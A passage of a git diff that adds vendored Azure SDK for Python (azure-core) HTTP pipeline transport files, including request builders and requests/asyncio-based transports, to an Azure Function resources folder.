HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = HttpRequest(method, self.format_url(url)) + + if params: + request.format_parameters(params) + + if headers: + request.headers.update(headers) + + if content is not None: + content_type = request.headers.get("Content-Type") + if isinstance(content, ET.Element): + request.set_xml_body(content) + # https://github.com/Azure/azure-sdk-for-python/issues/12137 + # A string is valid JSON, make the difference between text + # and a plain JSON string. + # Content-Type is a good indicator of intent from user + elif content_type and content_type.startswith("text/"): + request.set_text_body(content) + else: + try: + request.set_json_body(content) + except TypeError: + request.data = content + + if form_content: + request.set_formdata_body(form_content) + elif stream_content: + request.set_streamed_data_body(stream_content) + + return request + + def format_url(self, url_template, **kwargs): + # type: (str, Any) -> str + """Format request URL with the client base URL, unless the + supplied URL is already absolute. + + :param str url_template: The request URL to be formatted if necessary. + """ + url = _format_url_section(url_template, **kwargs) + if url: + parsed = urlparse(url) + if not parsed.scheme or not parsed.netloc: + url = url.lstrip("/") + try: + base = self._base_url.format(**kwargs).rstrip("/") + except KeyError as key: + err_msg = "The value provided for the url part {} was incorrect, and resulted in an invalid url" + raise ValueError(err_msg.format(key.args[0])) + + url = _urljoin(base, url) + else: + url = self._base_url.format(**kwargs) + return url + + def get( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + ): + # type: (...) -> HttpRequest + """Create a GET request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "GET", url, params, headers, content, form_content, None + ) + request.method = "GET" + return request + + def put( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a PUT request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "PUT", url, params, headers, content, form_content, stream_content + ) + return request + + def post( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a POST request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "POST", url, params, headers, content, form_content, stream_content + ) + return request + + def head( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a HEAD request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "HEAD", url, params, headers, content, form_content, stream_content + ) + return request + + def patch( + self, + url, # type: str + params=None, # type: Optional[Dict[str, str]] + headers=None, # type: Optional[Dict[str, str]] + content=None, # type: Any + form_content=None, # type: Optional[Dict[str, Any]] + stream_content=None, # type: Any + ): + # type: (...) -> HttpRequest + """Create a PATCH request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "PATCH", url, params, headers, content, form_content, stream_content + ) + return request + + def delete(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest + """Create a DELETE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "DELETE", url, params, headers, content, form_content, None + ) + return request + + def merge(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest + """Create a MERGE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param content: The body content + :param dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + request = self._request( + "MERGE", url, params, headers, content, form_content, None + ) + return request + + def options(self, url, params=None, headers=None, **kwargs): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any) -> HttpRequest + """Create a OPTIONS request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :keyword content: The body content + :keyword dict form_content: Form content + :return: An HttpRequest object + :rtype: ~azure.core.pipeline.transport.HttpRequest + """ + content = kwargs.get("content") + form_content = kwargs.get("form_content") + request = self._request( + "OPTIONS", url, params, headers, content, form_content, None + ) + return request diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_async.py new file mode 100644 index 0000000..f4dc02a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_async.py @@ -0,0 +1,134 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import asyncio +import abc +from collections.abc import AsyncIterator + +from typing import AsyncIterator as AsyncIteratorType, TypeVar, Generic, Any +from ._base import ( + _HttpResponseBase, + _HttpClientTransportResponse, +) +from ...utils._pipeline_transport_rest_shared_async import _PartGenerator + +try: + from contextlib import AbstractAsyncContextManager # type: ignore +except ImportError: # Python <= 3.7 + + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +class _ResponseStopIteration(Exception): + pass + + +def _iterate_response_content(iterator): + """"To avoid: + TypeError: StopIteration interacts badly with generators and cannot be raised into a Future + """ + try: + return next(iterator) + except StopIteration: + raise _ResponseStopIteration() + + +class AsyncHttpResponse(_HttpResponseBase): # pylint: disable=abstract-method + """An AsyncHttpResponse ABC. + + Allows for the asynchronous streaming of data from the response. + """ + + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: + """Generator for streaming response body data. + + Should be implemented by sub-classes if streaming download + is supported. Will return an asynchronous generator. + + :param pipeline: The pipeline object + :type pipeline: azure.core.pipeline.Pipeline + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + + def parts(self) -> AsyncIterator: + """Assuming the content-type is multipart/mixed, will return the parts as an async iterator. + + :rtype: AsyncIterator + :raises ValueError: If the content is not multipart/mixed + """ + if not self.content_type or not self.content_type.startswith("multipart/mixed"): + raise ValueError( + "You can't get parts if the response is not multipart/mixed" + ) + + return _PartGenerator(self, default_http_response_type=AsyncHttpClientTransportResponse) + + +class AsyncHttpClientTransportResponse(_HttpClientTransportResponse, AsyncHttpResponse): + """Create a HTTPResponse from an http.client response. + + Body will NOT be read by the constructor. Call "body()" to load the body in memory if necessary. + + :param HttpRequest request: The request. + :param httpclient_response: The object returned from an HTTP(S)Connection from http.client + """ + + +class AsyncHttpTransport( + AbstractAsyncContextManager, + abc.ABC, + Generic[HTTPRequestType, AsyncHTTPResponseType] +): + """An http sender ABC. + """ + + @abc.abstractmethod + async def send(self, request, **kwargs): + """Send the request using this HTTP sender. + """ + + @abc.abstractmethod + async def open(self): + """Assign new session if one does not already exist.""" + + @abc.abstractmethod + async def close(self): + """Close the session if it is not externally owned.""" + + async def sleep(self, duration): + await asyncio.sleep(duration) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_requests_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_requests_async.py new file mode 100644 index 0000000..cf23634 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_base_requests_async.py @@ -0,0 +1,48 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from ._requests_basic import RequestsTransport +from ._base_async import AsyncHttpTransport + +class RequestsAsyncTransportBase(RequestsTransport, AsyncHttpTransport): + async def _retrieve_request_data(self, request): + if hasattr(request.data, '__aiter__'): + # Need to consume that async generator, since requests can't do anything with it + # That's not ideal, but a list is our only choice. Memory not optimal here, + # but providing an async generator to a requests based transport is not optimal too + new_data = [] + async for part in request.data: + new_data.append(part) + data_to_send = iter(new_data) + else: + data_to_send = request.data + return data_to_send + + async def __aenter__(self): + return super(RequestsAsyncTransportBase, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(RequestsAsyncTransportBase, self).__exit__() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_bigger_block_size_http_adapters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_bigger_block_size_http_adapters.py new file mode 100644 index 0000000..dd5af6c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_bigger_block_size_http_adapters.py @@ -0,0 +1,47 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import sys +from requests.adapters import HTTPAdapter + + +class BiggerBlockSizeHTTPAdapter(HTTPAdapter): + def get_connection(self, url, proxies=None): + """Returns a urllib3 connection for the given URL. This should not be + called from user code, and is only exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param url: The URL to connect to. + :param proxies: (optional) A Requests-style dictionary of proxies used on this request. + :rtype: urllib3.ConnectionPool + """ + conn = super(BiggerBlockSizeHTTPAdapter, self).get_connection(url, proxies) + system_version = tuple(sys.version_info)[:3] + if system_version[:2] >= (3, 7): + if not conn.conn_kw: + conn.conn_kw = {} + conn.conn_kw['blocksize'] = 32768 + return conn diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_asyncio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_asyncio.py new file mode 100644 index 0000000..8f7f4b5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_asyncio.py @@ -0,0 +1,257 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +import functools +import logging +from typing import ( + Any, Optional, AsyncIterator as AsyncIteratorType, TYPE_CHECKING, overload +) +import urllib3 # type: ignore + +import requests + +from azure.core.exceptions import ( + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, +) +from azure.core.pipeline import Pipeline +from ._base import HttpRequest +from ._base_async import ( + AsyncHttpResponse, + _ResponseStopIteration, + _iterate_response_content) +from ._requests_basic import RequestsTransportResponse, _read_raw_stream, AzureErrorUnion +from ._base_requests_async import RequestsAsyncTransportBase +from .._tools import is_rest as _is_rest +from .._tools_async import handle_no_stream_rest_response as _handle_no_stream_rest_response + +if TYPE_CHECKING: + from ...rest import ( + HttpRequest as RestHttpRequest, + AsyncHttpResponse as RestAsyncHttpResponse + ) + +_LOGGER = logging.getLogger(__name__) + + +def _get_running_loop(): + try: + return asyncio.get_running_loop() + except AttributeError: # 3.5 / 3.6 + loop = asyncio._get_running_loop() # pylint: disable=protected-access, no-member + if loop is None: + raise RuntimeError('No running event loop') + return loop + + +#pylint: disable=too-many-ancestors +class AsyncioRequestsTransport(RequestsAsyncTransportBase): + """Identical implementation as the synchronous RequestsTransport wrapped in a class with + asynchronous methods. Uses the built-in asyncio event loop. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START asyncio] + :end-before: [END asyncio] + :language: python + :dedent: 4 + :caption: Asynchronous transport with asyncio. + """ + async def __aenter__(self): + return super(AsyncioRequestsTransport, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(AsyncioRequestsTransport, self).__exit__() + + async def sleep(self, duration): # pylint:disable=invalid-overridden-method + await asyncio.sleep(duration) + + @overload # type: ignore + async def send(self, request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse: # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + @overload # type: ignore + async def send(self, request: "RestHttpRequest", **kwargs: Any) -> "RestAsyncHttpResponse": # pylint:disable=invalid-overridden-method + """Send a `azure.core.rest` request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.rest.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.rest.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + + async def send(self, request, **kwargs): # pylint:disable=invalid-overridden-method + """Send the request using this HTTP sender. + + :param request: The HttpRequest + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The AsyncHttpResponse + :rtype: ~azure.core.pipeline.transport.AsyncHttpResponse + + :keyword requests.Session session: will override the driver session and use yours. + Should NOT be done unless really required. Anything else is sent straight to requests. + :keyword dict proxies: will define the proxy to use. Proxy is a dict (protocol, url) + """ + self.open() + loop = kwargs.get("loop", _get_running_loop()) + response = None + error = None # type: Optional[AzureErrorUnion] + data_to_send = await self._retrieve_request_data(request) + try: + response = await loop.run_in_executor( + None, + functools.partial( + self.session.request, + request.method, + request.url, + headers=request.headers, + data=data_to_send, + files=request.files, + verify=kwargs.pop('connection_verify', self.connection_config.verify), + timeout=kwargs.pop('connection_timeout', self.connection_config.timeout), + cert=kwargs.pop('connection_cert', self.connection_config.cert), + allow_redirects=False, + **kwargs)) + response.raw.enforce_content_length = True + + except urllib3.exceptions.NewConnectionError as err: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ReadTimeout as err: + error = ServiceResponseError(err, error=err) + except requests.exceptions.ConnectionError as err: + if err.args and isinstance(err.args[0], urllib3.exceptions.ProtocolError): + error = ServiceResponseError(err, error=err) + else: + error = ServiceRequestError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + error = IncompleteReadError(err, error=err) + else: + _LOGGER.warning("Unable to stream download: %s", err) + error = HttpResponseError(err, error=err) + except requests.RequestException as err: + error = ServiceRequestError(err, error=err) + + if error: + raise error + if _is_rest(request): + from azure.core.rest._requests_asyncio import RestAsyncioRequestsTransportResponse + retval = RestAsyncioRequestsTransportResponse( + request=request, + internal_response=response, + block_size=self.connection_config.data_block_size + ) + if not kwargs.get("stream"): + await _handle_no_stream_rest_response(retval) + return retval + + return AsyncioRequestsTransportResponse(request, response, self.connection_config.data_block_size) + + +class AsyncioStreamDownloadGenerator(AsyncIterator): + """Streams the response body data. + + :param pipeline: The pipeline object + :param response: The response object. + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + def __init__(self, pipeline: Pipeline, response: AsyncHttpResponse, **kwargs) -> None: + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + decompress = kwargs.pop("decompress", True) + if len(kwargs) > 0: + raise TypeError("Got an unexpected keyword argument: {}".format(list(kwargs.keys())[0])) + internal_response = response.internal_response + if decompress: + self.iter_content_func = internal_response.iter_content(self.block_size) + else: + self.iter_content_func = _read_raw_stream(internal_response, self.block_size) + self.content_length = int(response.headers.get('Content-Length', 0)) + + def __len__(self): + return self.content_length + + async def __anext__(self): + loop = _get_running_loop() + internal_response = self.response.internal_response + try: + chunk = await loop.run_in_executor( + None, + _iterate_response_content, + self.iter_content_func, + ) + if not chunk: + raise _ResponseStopIteration() + return chunk + except _ResponseStopIteration: + internal_response.close() + raise StopAsyncIteration() + except requests.exceptions.StreamConsumedError: + raise + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise HttpResponseError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + + +class AsyncioRequestsTransportResponse(AsyncHttpResponse, RequestsTransportResponse): # type: ignore + """Asynchronous streaming of data from the response. + """ + def stream_download(self, pipeline, **kwargs) -> AsyncIteratorType[bytes]: # type: ignore + """Generator for streaming request body data.""" + return AsyncioStreamDownloadGenerator(pipeline, self, **kwargs) # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_basic.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_basic.py new file mode 100644 index 0000000..524591d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_requests_basic.py @@ -0,0 +1,372 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from __future__ import absolute_import +import logging +from typing import Iterator, Optional, Any, Union, TypeVar, overload, TYPE_CHECKING +import urllib3 # type: ignore +from urllib3.util.retry import Retry # type: ignore +from urllib3.exceptions import ( + DecodeError as CoreDecodeError, ReadTimeoutError, ProtocolError +) +import requests + +from azure.core.configuration import ConnectionConfiguration +from azure.core.exceptions import ( + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, + DecodeError +) +from . import HttpRequest # pylint: disable=unused-import + +from ._base import ( + HttpTransport, + HttpResponse, + _HttpResponseBase +) +from ._bigger_block_size_http_adapters import BiggerBlockSizeHTTPAdapter +from .._tools import is_rest as _is_rest, handle_non_stream_rest_response as _handle_non_stream_rest_response + +if TYPE_CHECKING: + from ...rest import HttpRequest as RestHttpRequest, HttpResponse as RestHttpResponse + +AzureErrorUnion = Union[ + ServiceRequestError, + ServiceResponseError, + IncompleteReadError, + HttpResponseError, +] + +PipelineType = TypeVar("PipelineType") + +_LOGGER = logging.getLogger(__name__) + +def _read_raw_stream(response, chunk_size=1): + # Special case for urllib3. + if hasattr(response.raw, 'stream'): + try: + for chunk in response.raw.stream(chunk_size, decode_content=False): + yield chunk + except ProtocolError as e: + raise ServiceResponseError(e, error=e) + except CoreDecodeError as e: + raise DecodeError(e, error=e) + except ReadTimeoutError as e: + raise ServiceRequestError(e, error=e) + else: + # Standard file-like object. + while True: + chunk = response.raw.read(chunk_size) + if not chunk: + break + yield chunk + + # following behavior from requests iter_content, we set content consumed to True + # https://github.com/psf/requests/blob/master/requests/models.py#L774 + response._content_consumed = True # pylint: disable=protected-access + + +class _RequestsTransportResponseBase(_HttpResponseBase): + """Base class for accessing response data. + + :param HttpRequest request: The request. + :param requests_response: The object returned from the HTTP library. + :param int block_size: Size in bytes. + """ + def __init__(self, request, requests_response, block_size=None): + super(_RequestsTransportResponseBase, self).__init__(request, requests_response, block_size=block_size) + self.status_code = requests_response.status_code + self.headers = requests_response.headers + self.reason = requests_response.reason + self.content_type = requests_response.headers.get('content-type') + + def body(self): + return self.internal_response.content + + def text(self, encoding=None): + # type: (Optional[str]) -> str + """Return the whole body as a string. + + If encoding is not provided, mostly rely on requests auto-detection, except + for BOM, that requests ignores. If we see a UTF8 BOM, we assumes UTF8 unlike requests. + + :param str encoding: The encoding to apply. + """ + if not encoding: + # There is a few situation where "requests" magic doesn't fit us: + # - https://github.com/psf/requests/issues/654 + # - https://github.com/psf/requests/issues/1737 + # - https://github.com/psf/requests/issues/2086 + from codecs import BOM_UTF8 + if self.internal_response.content[:3] == BOM_UTF8: + encoding = "utf-8-sig" + + if encoding: + if encoding == "utf-8": + encoding = "utf-8-sig" + + self.internal_response.encoding = encoding + + return self.internal_response.text + + +class StreamDownloadGenerator(object): + """Generator for streaming response data. + + :param pipeline: The pipeline object + :param response: The response object. + :keyword bool decompress: If True which is default, will attempt to decode the body based + on the *content-encoding* header. + """ + def __init__(self, pipeline, response, **kwargs): + self.pipeline = pipeline + self.request = response.request + self.response = response + self.block_size = response.block_size + decompress = kwargs.pop("decompress", True) + if len(kwargs) > 0: + raise TypeError("Got an unexpected keyword argument: {}".format(list(kwargs.keys())[0])) + internal_response = response.internal_response + if decompress: + self.iter_content_func = internal_response.iter_content(self.block_size) + else: + self.iter_content_func = _read_raw_stream(internal_response, self.block_size) + self.content_length = int(response.headers.get('Content-Length', 0)) + + def __len__(self): + return self.content_length + + def __iter__(self): + return self + + def __next__(self): + internal_response = self.response.internal_response + try: + chunk = next(self.iter_content_func) + if not chunk: + raise StopIteration() + return chunk + except StopIteration: + internal_response.close() + raise StopIteration() + except requests.exceptions.StreamConsumedError: + raise + except requests.exceptions.ContentDecodingError as err: + raise DecodeError(err, error=err) + except requests.exceptions.ChunkedEncodingError as err: + msg = err.__str__() + if 'IncompleteRead' in msg: + _LOGGER.warning("Incomplete download: %s", err) + internal_response.close() + raise IncompleteReadError(err, error=err) + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise HttpResponseError(err, error=err) + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + internal_response.close() + raise + next = __next__ # Python 2 compatibility. + + +class RequestsTransportResponse(HttpResponse, _RequestsTransportResponseBase): + """Streaming of data from the response. + """ + def stream_download(self, pipeline, **kwargs): + # type: (PipelineType, **Any) -> Iterator[bytes] + """Generator for streaming request body data.""" + return StreamDownloadGenerator(pipeline, self, **kwargs) + + +class RequestsTransport(HttpTransport): + """Implements a basic requests HTTP sender. + + Since requests team recommends to use one session per requests, you should + not consider this class as thread-safe, since it will use one Session + per instance. + + In this simple implementation: + - You provide the configured session if you want to, or a basic session is created. + - All kwargs received by "send" are sent to session.request directly + + :keyword requests.Session session: Request session to use instead of the default one. + :keyword bool session_owner: Decide if the session provided by user is owned by this transport. Default to True. + :keyword bool use_env_settings: Uses proxy settings from environment. Defaults to True. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sync.py + :start-after: [START requests] + :end-before: [END requests] + :language: python + :dedent: 4 + :caption: Synchronous transport with Requests. + """ + + _protocols = ['http://', 'https://'] + + def __init__(self, **kwargs): + # type: (Any) -> None + self.session = kwargs.get('session', None) + self._session_owner = kwargs.get('session_owner', True) + self.connection_config = ConnectionConfiguration(**kwargs) + self._use_env_settings = kwargs.pop('use_env_settings', True) + + def __enter__(self): + # type: () -> RequestsTransport + self.open() + return self + + def __exit__(self, *args): # pylint: disable=arguments-differ + self.close() + + def _init_session(self, session): + # type: (requests.Session) -> None + """Init session level configuration of requests. + + This is initialization I want to do once only on a session. + """ + session.trust_env = self._use_env_settings + disable_retries = Retry(total=False, redirect=False, raise_on_status=False) + adapter = BiggerBlockSizeHTTPAdapter(max_retries=disable_retries) + for p in self._protocols: + session.mount(p, adapter) + + def open(self): + if not self.session and self._session_owner: + self.session = requests.Session() + self._init_session(self.session) + + def close(self): + if self._session_owner and self.session: + self.session.close() + self._session_owner = False + self.session = None + + @overload + def send(self, request, **kwargs): + # type: (HttpRequest, Any) -> HttpResponse + """Send a rest request and get back a rest response. + + :param request: The request object to be sent. + :type request: ~azure.core.pipeline.transport.HttpRequest + :return: An HTTPResponse object. + :rtype: 